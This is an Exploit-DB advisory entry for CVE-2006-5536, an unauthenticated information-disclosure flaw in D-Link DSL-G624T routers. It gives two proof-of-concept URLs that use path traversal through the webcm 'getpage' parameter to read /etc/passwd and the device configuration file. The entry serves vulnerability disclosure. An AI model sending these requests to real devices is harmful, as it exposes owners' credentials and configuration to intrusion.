D-Link DSL-G624T Information Disclosure Vulnerability

2006-10-23T00:00:00
ID EDB-ID:28847
Type exploitdb
Reporter jose.palanco
Modified 2006-10-23T00:00:00

Description

D-Link DSL-G624T Information Disclosure Vulnerability. CVE-2006-5536. Remote exploit for hardware platform

                                        
                                            source: http://www.securityfocus.com/bid/20689/info

D-Link DSL-G624T devices are prone to a remote information-disclosure vulnerability because the devices fail to properly sanitize user-supplied input.

Exploiting this issue allows remote, unauthenticated attackers to gain access to potentially sensitive configuration information from affected devices. This may aid them in further attacks.

http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/passwd
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/config.xml